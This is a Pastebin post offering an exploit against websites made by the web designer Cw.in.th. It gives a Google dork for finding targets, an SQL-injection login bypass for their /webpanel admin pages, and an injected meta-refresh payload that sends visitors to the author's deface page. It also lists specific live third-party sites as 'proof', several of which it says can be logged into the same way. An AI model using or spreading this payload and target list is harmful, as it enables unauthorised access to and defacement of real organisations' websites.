Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim Website
- ###########################################
- ~Special Thanks Ashiyane Digital Security Team.! ^
- ~Exploit Title : Design By Cw.in.th Admin Page Bypass Leading to XSS ATTACKS on Victim website
- ~Exploit Author: Lelouch Baklita
- ~Date : June 2 2016
- ~Tested on Live sites: See them on 3. Proof
- # Vendor Homepage : http://cw.in.th/
- # Google Dork : intext:"Design By Cw.in.th"
- ~Contact:lordzero2222@gmail.com
- ~facebook.com/MagdaloCyberArmy/
- ~facebook.com/www.globalsec.hacks.ph/
- #########################################^
- So i'll use their exploit as an reference to this exploit.
- You can see it Here -> https://cxsecurity.com/issue/WLB-2016060006
- so now lets start.
- ######################
- # Exploit Title : Design By Cw.in.th Admin Page Bypass
- # Exploit Author : Ashiyane Digital Security Team
- # Vendor Homepage : http://cw.in.th/
- # Google Dork : intext:"Design By Cw.in.th"
- # Date: 2016 05 31
- # Tested On : Kali
- # Contact:n3t.hacker@gmail.com
- ######################
- # Describe : Search Dork And Select Target . Now Input webpanel/index.php After Url Such As:
- #
- # http://site.com/webpanel/index.php
- #
- # Enter Username and Password : '=' 'OR'
- #
- # ชื่อเข้าใช้งาน : '=' 'OR'
- # รหัสผ่าน : '=' 'OR'
- So lets get the job started.
- 0.i supposed you have some sites now but i guarantee most of them was RAPED
- 1.
- After logging in if you see any form boxes.... if you cant see any then search :b there is an language thing problem you can use google translate if you cant understand what it says.
- 2. use the code below
- <meta http-equiv="refresh" content="1;URL=http://mammothcar.net/calebpogi.html"></span> <--- this will redirect to the desired url.
- 3.
- http://mammothcar.net/calebpogi.html on this situation the html on mammothcar.net thats my deface page,but on your own you will change it on your own Deface Page Link. but you can try other method as well
- 4.
- Proof :
- http://premierlighting.co.th/webpanel/index.php <-- Log in there using '=' 'OR' then it will redirect :b
- http://www.aurora-works.com/
- http://www.tokyogemlab.co.th/newsevents.php
- http://www.artiste-model.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b
- http://www.hicoff.com/webpanel/ <-- Log in there using '=' 'OR' then it will redirect :b
- Thanks for reading! Mabuhay!
- Update: Still waiting for the vendor's to response :v
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement